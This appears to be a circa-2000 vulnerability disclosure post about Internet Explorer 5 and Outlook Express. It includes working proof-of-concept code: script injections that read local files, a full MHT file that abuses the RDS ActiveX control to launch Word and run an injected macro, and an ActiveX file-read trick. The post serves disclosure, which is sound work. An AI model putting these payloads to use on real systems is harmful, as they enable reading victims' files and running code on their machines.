CSS Exploits + RDS (IE5)

[s.hird () STUDENT QUT EDU AU (Shane Hird)]

<Disclaimed>

All these issues have been disclosed to MS, however no action has been taken
so I assume they have decided not to patch the following problems.

Small CSS Overview:

Cross site scripting issues have been known for quite while now, in fact a
long time before the recent CERT advisory about the matter, MS have had in
place security measures for this ever since they started displaying custom
local 404 error messages and others.

taken directly from res://C:\WINDOWS\SYSTEM32\SHDOCLC.DLL/HTTP_404.HTM

        // Security precaution: must filter out "urlResult" and "displayresult"
        forbiddenChars = new RegExp("[<>\'\"]", "g");   // Global search/replace
        urlresult = urlresult.replace(forbiddenChars, "");
        displayresult = displayresult.replace(forbiddenChars, "");

Obviously, because the page will be displaying remotely defined strings in
the local zone, MS have filtered out 'dangerous' characters, which is fair
enough. Without this security precaution, this page and others could easily
be exploited. In fact, there are certain ones which are, which will be shown
later, although they are a minor problem.

MK/RES LFN CSS Bug:

There are a few problems with the RES and MK and probably other protocols in
that they dont recognise the temporary internet files as an internet zone
when specified in short 8 char format. ie, the following will be opened in
the 'local' zone whereas they would normally be opened in the 'Internet'
zone if specified using LFN.

"res://C:\Windows\Tempor~1\Content.IE5\XXXXXXX\dllfile.mid/htmlfile.htm"
"mk:@MSITStore:C:\Windows\Tempor~1\Content.IE5\XXXXXXX\chmfile.chm::/htmfile
.htm"

This may not be much of an issue due to the fact that 'XXXXXXXX' is a random
string and pretty much impossible to guess. However, outlook places TEMP
files in the TEMP directory (not the temporary internet files directory) and
places temp HTM files in the root of the Temporary Internet Files directory
so it is easy to guess the location. And HTM files can be extracted and
opened (in the 'local' zone) from the likes of MID files so can be exploited
in a similar fashion to the Active Setup problem, although it would simply
be a CSS exploit (which can be potentially serious, see later). The are
various ways of exploiting this through outlook using various protocols and
file formats etc, I wont list them here, but basically by not using a local
temp directory and instead a random temp internet files directory it would
solve most of the problems.

Web Accessories CSS Bug:

MS have released extensions to IE that allow viewing an image list, URL list
and document tree among other things. These extensions are essentially just
HTM files which parse the current HTM file and display results using script,
which is shown in the local zone. Immediately one realises that this can be
exploited if we can define the strings which are displayed, which we can.
Each of the below lines will display a text file when one of the extensions
is used on the current HTM file. This is a typical CSS bug, which can be
exploited further with the use of RDS, see later.

Document Tree Exploit:
<OBJECT
ID="<SCRIPT>a=window.open('file://c:/test.txt');alert('wait');alert(a.docume
nt.body.innerText);</SCRIPT>"  CLASSID="CLSID:0"></OBJECT>

URL List Exploit:
<a
href="<SCRIPT>a=window.open('file://c:/test.txt');alert('wait');alert(a.docu
ment.body.innerText);</SCRIPT>"></a>

Image List Exploit:
<IMG
src="<SCRIPT>a=window.open('file://c:/test.txt');alert('wait');alert(a.docum
ent.body.innerText);</SCRIPT>">

MHT Temp File CSS Bug:

A typical Temp file vulnerability. IE5 (or one of them) introduced the new
'Web Archive' format for storing web pages, which have the extension MHT.
IE5 essentially takes each file which is needed for display of the page and
encodes sequentially to a single MHT file in the format of a MIME message,
7bit and Base64 encoding and all, it even has a 'From:' field. (this by the
way makes it difficult to send and recieve MHT attachments because outlook,
or perhaps the mail server, converts it into MSG format, completely
destroying the original file).

When parsing the MHT file, IE extracts each file and places it into a single
locked TMP file, however if the file referenced is in a frame or an IFRAME,
the file is extracted and placed into its own unlocked file in the local
temp directory, with guessable names, in fact, even definable names. An
example exploit is included with the note about RDS.

RDS ActiveX Control Bug:

A new ActiveX control I think included with Visual Studio and probably IIS
and other databasey type applications :). Anyway, when invoked in the local
zone one can avoid the 'ActiveX' warning by creating business objects via
DCOM using IP 127.0.0.1 instead of 'in-process' and from there take on
pratically any action with permissions dependent on the current DCOM
settings and current user. I believe this works on default configurations of
any Win machine with RDS installed.

This example fires up MS word and runs a custom macro, which from there you
can take on any action at all. The example is included as part of the MHT
exploit, which will extract a file to the temp directory and open it.
Hopefully this won't get stuffed up by any 'smart' mail server.

<------------------------ snip MHTExp.MHT --------------------->

From: <Saved by Microsoft Internet Explorer 5>
Subject: MHT Exploit
Date: Thu, 17 Feb 2000 19:31:45 +1000
MIME-Version: 1.0
Content-Type: multipart/alternative;
        boundary="----=_NextPart_000_0000_01BF797D.A014BDD0"
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600

This is a multi-part message in MIME format.

------=_NextPart_000_0000_01BF797D.A014BDD0
Content-Type: text/html;
        charset="Windows-1252"
Content-Transfer-Encoding: 7bit
Content-Location: MHTEXploit

<html>
<head>
<title>MHT Exploit</title>
</head>

<frameset cols="*">
        <frame name="local" src="file:Exploit.htm">
</frameset>
</html>

------=_NextPart_000_0000_01BF797D.A014BDD0
Content-Type: text/html;
        charset="Windows-1252"
Content-Transfer-Encoding: 7bit
Content-Location: file:Exploit.htm

<HTML>

<script language="VBScript"><!--

if location.protocol <> "file:" then
        document.writeln("Exploiting MHT temp file vuln - Shane Hird")

        'Note - Replace with required temp directory.

        window.open("file://C:\Documents and Settings\Shane\Local
Settings\Temp\Exploit.htm")

else
        msgbox("Running in local context")
        set rds = CreateObject("RDS.DataSpace")
        set busobj = rds.CreateObject("Word.Application", "127.0.0.1")
        busobj.visible = TRUE
        Set NT = busobj.Templates(1).VBProject.VBComponents(1).CodeModule
        NT.DeleteLines 1, NT.CountOfLines
        NT.InsertLines 1, "Public Sub Example()"
        NT.InsertLines 2, "     MsgBox (" + Chr(34) + "Example Code..." + Chr(34) + ")"
        NT.InsertLines 3, "End Sub"
        busobj.run "Normal.ThisDocument.Example"
        NT.DeleteLines 1, NT.CountOfLines
        set NT = Nothing
        busobj.quit
        window.close
end if

--></script>

------=_NextPart_000_0000_01BF797D.A014BDD0--

<---------------- snip MHTExp.mht ------------------->

Outlook Express ActiveX Exploit:

There is also this old exploit which apparently got fixed in IE5, but was
never announced. It will allow reading of any file on the users machine,
after the first newline of the file using an ActiveX provided by Outlook
Express.

<object id="MIME" classid="clsid:1C82EAD9-508E-11D1-8DCF-00C04FB951F9"
width="500" height="150"></object>

<script language="Vbscript"><!--

msgbox("Please wait while control is loaded..." + Chr(10) + "Outlook Express
MIME Editor Exploit" + Chr(10) + "Written by: Shane Hird")
MIME.src="C:\test.txt"
msgbox("File Loaded")
document.write("<P>File is displayed below</P><HR><PRE>")
document.write(MIME.messagesource)

--></script>

End:

I think thats all of them, excuse the mess, and the fact that they're all
compiled into one message, but they're all kind of related and I didn't
think they deserved they're own individual post.

-Shane Hird             s.hird () student qut edu au